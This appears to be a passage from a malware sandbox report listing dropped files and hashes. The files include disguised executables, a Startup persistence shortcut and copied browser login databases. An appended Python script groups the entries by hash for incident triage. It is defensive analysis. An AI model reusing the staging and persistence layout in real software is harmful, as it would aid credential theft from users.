SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/3172-627-0x0000000007D40000-0x0000000007E4A000-memory.dmp

memory/2664-628-0x0000000000400000-0x000000000062D000-memory.dmp

memory/3172-629-0x0000000073F70000-0x0000000074720000-memory.dmp

memory/2124-630-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2664-631-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3172-636-0x00000000075D0000-0x000000000760C000-memory.dmp

memory/1080-642-0x0000000000400000-0x0000000000AFF000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\pLFkWHfL7rt_NoRn4GCeHrVB.exe

MD5 f0033521f40c06dec473854c7d98fa8b
SHA1 28dadfe642a0c308e1f744b0d87a6d22dd6cd55a
SHA256 4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e
SHA512 f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

memory/1080-652-0x0000000000400000-0x0000000000AFF000-memory.dmp

memory/3172-656-0x0000000007610000-0x000000000765C000-memory.dmp

memory/3788-662-0x0000000073F70000-0x0000000074720000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2dN8469.exe

MD5 cb0601eb9b5477c4c1c3a64043e00fea
SHA1 f84e149933d290a9701a613307754e65c587dfd4
SHA256 bfad3237e4715387d1eb9871aea201ff23c2ec2af010165d813683ca7f8be34c
SHA512 bae89a763dd318fd674b3149ed1de48f92eb2d43d892ea3ae0c69c9b2acb507445fac657e9d9f2c92400a9579cead8d14f24165420dbbf70c78d5d1c473c5d5a

memory/2680-683-0x0000000000ED0000-0x0000000001A9C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E1993F15A3402D743FF8169CEB684DD3

MD5 d7c025b48fe3c05dc6606486256bea05
SHA1 0625ecf298d0a6acf25a6471bf5a555d0901b895
SHA256 a489dc6e28fdcae4e92daf4e6a926856714ce32fbaa3fea6f00a0fb0e5e0e648
SHA512 2355277be5e8c4a9b72f3f1e13d6c398bcd92d4d00d90bb5fe69d8406a6c75a774f386277623feda4cfca4a9c736e906c7ef38a4961816c55b4ae260010a4594

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E1993F15A3402D743FF8169CEB684DD3

MD5 ed5ba5e5d425e7baad53995722b8c2d1
SHA1 af4a6a5efe1bcf5d7dad2b0ecbc5fea7ccd6ef5e
SHA256 e82f4e7544d9f5a201d9217c9ad0ffc7f00482e1464e322905003ef156c3183a
SHA512 c572284a7f70df62bcb19a2140d8dfa84e24f4132ba9b47f07b91e3a3f50ec7654cbe87647f822c956aa6538aacd8f51b052784a626d82a30701ddfe1441d760

C:\Users\Admin\AppData\Local\Temp\tempAVSf6lsux2K1te_\8ghN89CsjOW1Login Data For Account

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tempAVSf6lsux2K1te_\JX0OQi4nZtiqWeb Data

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tempAVSf6lsux2K1te_\D87fZN3R3jFeWeb Data

MD5 5b39e7698deffeb690fbd206e7640238
SHA1 327f6e6b5d84a0285eefe9914a067e9b51251863
SHA256 53209f64c96b342ff3493441cefa4f49d50f028bd1e5cc45fe1d8b4c9d9a38f8
SHA512 f1f9bc156af008b9686d5e76f41c40e5186f563f416c73c3205e6242b41539516b02f62a1d9f6bcc608ccde759c81def339ccd1633bc8acdd6a69dc4a6477cc7

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

MD5 a102cea468c6316f61d17d489d8c3a81
SHA1 c3ed086200b03fe56c9f67ee548ebe2f1ac0f2cf
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
SHA512 ba8d100470545cab99b9e24c40ce254679e038e9191ae1b14ab14eeec409a783aa9903589f74940a53a50e7b05fde6ad72560a39861957d5053bec00bf26de86

memory/1088-756-0x00000000002B0000-0x0000000000DF4000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

MD5 a102cea468c6316f61d17d489d8c3a81
SHA1 c3ed086200b03fe56c9f67ee548ebe2f1ac0f2cf
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
SHA512 ba8d100470545cab99b9e24c40ce254679e038e9191ae1b14ab14eeec409a783aa9903589f74940a53a50e7b05fde6ad72560a39861957d5053bec00bf26de86

C:\Users\Admin\AppData\Local\Temp\tempCMSf6lsux2K1te_\information.txt

MD5 af8d18b0092aba6a36cc0783c07c1bac
SHA1 ee2986930877e1c5c1089639c76b4086f84db79a
SHA256 d297e09bdc631c5c80f0510bbf0ce40b9b7ddd381dc3c272349b8243f9510a2c
SHA512 c239689352a0b8221deb11fa8ef8d495180706f230d825b2ba75c94561cc3c4bdc2d417cef0605d7b38148b363cfe38849dfb580c178c7caa86e37617a7b975f

memory/2680-786-0x0000000000ED0000-0x0000000001A9C000-memory.dmp

memory/3172-787-0x0000000007380000-0x0000000007390000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe

MD5 93a83c35a0febf8376a76d36f8f3e1c1
SHA1 c112ccfcfe63a72595cba83d9c4f815c5f4b36a4
SHA256 3fb9b791cb2d5ae79b9332be3b78048c98e957c0804b1f28cdd6f3d0e222f7cc
SHA512 428a8e3acb890749e3fe81f3e6ba320f55483bb85ec25d6d1f3ddd83bf66e3b6c825f3eac62923350b6db1b94de352564a423dd8a33ea6b7d75b3fbc7ed84f11

memory/2940-790-0x0000000000330000-0x0000000000851000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/1080-800-0x0000000000400000-0x0000000000AFF000-memory.dmp

memory/2124-858-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\pLFkWHfL7rt_NoRn4GCeHrVB.exe

MD5 f0033521f40c06dec473854c7d98fa8b
SHA1 28dadfe642a0c308e1f744b0d87a6d22dd6cd55a
SHA256 4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e
SHA512 f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

memory/2940-867-0x0000000077174000-0x0000000077176000-memory.dmp

memory/3172-872-0x0000000000B30000-0x0000000000B96000-memory.dmp

C:\ProgramData\WinTrackerSP\WinTrackerSP.exe

MD5 a102cea468c6316f61d17d489d8c3a81
SHA1 c3ed086200b03fe56c9f67ee548ebe2f1ac0f2cf
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
SHA512 ba8d100470545cab99b9e24c40ce254679e038e9191ae1b14ab14eeec409a783aa9903589f74940a53a50e7b05fde6ad72560a39861957d5053bec00bf26de86

C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe

MD5 93a83c35a0febf8376a76d36f8f3e1c1
SHA1 c112ccfcfe63a72595cba83d9c4f815c5f4b36a4
SHA256 3fb9b791cb2d5ae79b9332be3b78048c98e957c0804b1f28cdd6f3d0e222f7cc
SHA512 428a8e3acb890749e3fe81f3e6ba320f55483bb85ec25d6d1f3ddd83bf66e3b6c825f3eac62923350b6db1b94de352564a423dd8a33ea6b7d75b3fbc7ed84f11

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

MD5 2402b00a7bbf7834aaac466c7470a795
SHA1 4b254e7b9522e397896dea605a9b3eef4e4873e2
SHA256 ae8a928c3296de2235f5773e62fe552cd4384af42ad25f98dcbd56387191d2b6
SHA512 8ef9581be236d38c0134f0b43423c65a6605ccf1acb6bcdf307e90b98205e5d86fff18f8891463c4c91de2fbc727bc41190eb000dc2d829353fc8c1239f014d5

C:\Users\Admin\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe

MD5 a102cea468c6316f61d17d489d8c3a81
SHA1 c3ed086200b03fe56c9f67ee548ebe2f1ac0f2cf
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
SHA512 ba8d100470545cab99b9e24c40ce254679e038e9191ae1b14ab14eeec409a783aa9903589f74940a53a50e7b05fde6ad72560a39861957d5053bec00bf26de86

C:\Users\Admin\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe

MD5 a102cea468c6316f61d17d489d8c3a81
SHA1 c3ed086200b03fe56c9f67ee548ebe2f1ac0f2cf
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
SHA512 ba8d100470545cab99b9e24c40ce254679e038e9191ae1b14ab14eeec409a783aa9903589f74940a53a50e7b05fde6ad72560a39861957d5053bec00bf26de86

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/1812-894-0x00000000047F0000-0x0000000004882000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

MD5 a102cea468c6316f61d17d489d8c3a81
SHA1 c3ed086200b03fe56c9f67ee548ebe2f1ac0f2cf
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
SHA512 ba8d100470545cab99b9e24c40ce254679e038e9191ae1b14ab14eeec409a783aa9903589f74940a53a50e7b05fde6ad72560a39861957d5053bec00bf26de86

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\HCFBFBAEBKJKEBGCAEHCFCBAEH

MD5 60e20377222685886431e0cef3103548
SHA1 c049f3925bb263197ca81ba5978bde8e80385095
SHA256 80e6ef4efb13a72e98769c04c3b726a42a369e3185758d6cacd6e661124fa42a
SHA512 eceda0208a20a89c15577e1c702671816d5e782e62e9d41b2782f768f1748a8d8f52a3b8dd8fa140c80e2311e55db75613d21a15d4d3378f8ada05ae9d5e90f0

memory/3172-919-0x00000000096B0000-0x0000000009726000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 f0033521f40c06dec473854c7d98fa8b
SHA1 28dadfe642a0c308e1f744b0d87a6d22dd6cd55a
SHA256 4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e
SHA512 f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/2940-934-0x0000000000330000-0x0000000000851000-memory.dmp

memory/3672-936-0x00000000048F0000-0x0000000004986000-memory.dmp

memory/3172-937-0x0000000008CD0000-0x0000000008CEE000-memory.dmp

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/756-942-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

MD5 627f02d5e9dde53111a2953059db9372
SHA1 ffed5b0eda9791c42fa928111fcc973c0682a585
SHA256 bfc09d350d8bcedb1dbaddcf85e4a993907ac0dceba795556947312855d9a7cd
SHA512 01a286dcc7196a187f44c1143ad53bbc43556f5c9338003bd9291f40105378bab60e569a0ee8d5f6f28c41ad6e131423e02666818bfc058e166f555579bef1ab

memory/3144-969-0x000002680B200000-0x000002680B222000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jtnroi3l.wdb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3144-970-0x00007FFE3A6E0000-0x00007FFE3B1A1000-memory.dmp

memory/3144-972-0x0000026823760000-0x0000026823770000-memory.dmp

memory/3144-977-0x0000026823760000-0x0000026823770000-memory.dmp

memory/4140-978-0x0000000000840000-0x0000000000940000-memory.dmp

memory/4140-980-0x0000000000810000-0x0000000000819000-memory.dmp

memory/3144-981-0x0000026823760000-0x0000026823770000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/4536-986-0x0000000000400000-0x0000000000409000-memory.dmp

memory/756-993-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3144-994-0x0000026823760000-0x0000026823770000-memory.dmp

memory/3144-1001-0x00007FFE3A6E0000-0x00007FFE3B1A1000-memory.dmp

memory/4536-1034-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3172-1038-0x0000000009780000-0x00000000097D0000-memory.dmp

memory/3172-1047-0x00000000099A0000-0x0000000009B62000-memory.dmp

memory/3172-1056-0x000000000A0A0000-0x000000000A5CC000-memory.dmp

memory/4668-1061-0x00007FFE3A6E0000-0x00007FFE3B1A1000-memory.dmp

memory/4668-1062-0x000001EE7ED90000-0x000001EE7EDA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe

MD5 fa0f9adea2e58ed44c52716416964850
SHA1 07d4df5af7cc0c1e43d8b4a88798f2f5f84e8b31
SHA256 df75b62e373e0b91f26384b21aaa8e4dc86c13078cec7e32ad595d0c86d3fedb
SHA512 63f476c5e212d67eefe8723c21a65a7c5ccaea543cb8901410c6ed1378a7b0d8e0a130dab08d59ecc09dc3feac4282aebdf645d2f9cfd330224f2f161dad4185

C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe

MD5 a7ee1f4bf11bdfab2327d098c6583af1
SHA1 b59a2989c0f48597f691d3ead8f549f2327c6d0a
SHA256 d74686c87f0777d1e8c4fcc18b40fe3ce97d6e531e23b6665037e5599b72aa32
SHA512 b9d4c65a167ccd15891c97ebcdbe02e46d1411c13284c986039c4e172cf7cfbd450aab80af71f95d13c001a39ff0a01a44288f19b6432a08c0bd32895d7a8ec9

C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\D7D0.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155
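The listing above records the same content hash under several paths: MD5 a102cea468c6316f61d17d489d8c3a81 appears as rdhZN9I3cWFI4VEF12CLk6S5.exe in the user's Pictures folder, as C:\ProgramData\WinTrackerSP\WinTrackerSP.exe, as PowerExpertNT.exe under AppData\Local\Temp and as ExtreamFanV5.exe under AppData\Local, next to a PowerExpertNT.lnk written to the Startup folder. Reading that by eye across hundreds of entries is error-prone, so the following is an added example (not part of the report and not the sandbox's own tooling) of a parser that groups the Files section by SHA256 and flags every hash written to more than one location. The sample text is a subset of entries copied from this report in the report's own layout; the location buckets (startup-folder, programdata, user-temp, appdata) are a heuristic of mine, and the listing alone does not say what the .lnk points to, so the script does not claim that either.

```python
import re
from collections import defaultdict

# Constructed sample: entries copied from this report's Files section, in the
# report's layout (path line followed by "<ALGO> <hex>" lines). SHA1/SHA512
# lines and the blank separator lines are dropped for brevity; the parser
# accepts both. The memory/... line is a sandbox memory-dump record, not a file.
SAMPLE = r"""
C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
MD5 a102cea468c6316f61d17d489d8c3a81
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
memory/1088-756-0x00000000002B0000-0x0000000000DF4000-memory.dmp
C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
MD5 a102cea468c6316f61d17d489d8c3a81
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
MD5 a102cea468c6316f61d17d489d8c3a81
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk
MD5 2402b00a7bbf7834aaac466c7470a795
SHA256 ae8a928c3296de2235f5773e62fe552cd4384af42ad25f98dcbd56387191d2b6
C:\Users\Admin\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe
MD5 a102cea468c6316f61d17d489d8c3a81
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
C:\Users\Admin\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe
MD5 a102cea468c6316f61d17d489d8c3a81
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
C:\Users\Admin\Pictures\Minor Policy\pLFkWHfL7rt_NoRn4GCeHrVB.exe
MD5 f0033521f40c06dec473854c7d98fa8b
SHA256 4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
MD5 f0033521f40c06dec473854c7d98fa8b
SHA256 4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")  # a Windows absolute path opens a record


def parse_files_section(text):
    """Turn the listing into [{'path': ..., 'md5': ..., 'sha256': ...}, ...].

    A record opens at a path line and absorbs the hash lines that follow it;
    blank lines and memory/... dump records are skipped.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("memory/"):
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2).lower()
        elif PATH_RE.match(line):
            current = {"path": line}
            records.append(current)
    return records


def paths_by_sha256(records):
    """Map each SHA256 to the sorted, de-duplicated paths it was written to."""
    groups = defaultdict(set)
    for r in records:
        if "sha256" in r:
            groups[r["sha256"]].add(r["path"])
    return {h: sorted(p) for h, p in groups.items()}


def multi_location_payloads(records, min_paths=2):
    """Hashes dropped under at least min_paths distinct paths: one payload
    copied to several locations, the pattern behind the Startup/ProgramData
    copies in this report."""
    return {h: p for h, p in paths_by_sha256(records).items() if len(p) >= min_paths}


def location_class(path):
    """Coarse bucket for where a file landed (my heuristic, not a verdict)."""
    p = path.lower()
    if "\\start menu\\programs\\startup\\" in p:
        return "startup-folder"
    if p.startswith("c:\\programdata\\"):
        return "programdata"
    if "\\appdata\\local\\temp\\" in p:
        return "user-temp"
    if "\\appdata\\" in p:
        return "appdata"
    return "other"


def summarize(text):
    """One row per multi-location payload: hash, paths and location buckets."""
    records = parse_files_section(text)
    return [
        {"sha256": h, "paths": paths,
         "locations": sorted({location_class(p) for p in paths})}
        for h, paths in multi_location_payloads(records).items()
    ]


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["sha256"], row["locations"])
        for p in row["paths"]:
            print("   ", p)
```

Run against the full Files section, the output is the list of hashes worth pivoting on first: each one is a single binary that the chain planted in several places, and the paths tell you which copies to collect and which persistence locations to check on a real host. The Startup .lnk shares its name with the PowerExpertNT.exe copy, which is a reasonable lead, but confirming the link target needs the .lnk itself, not this listing.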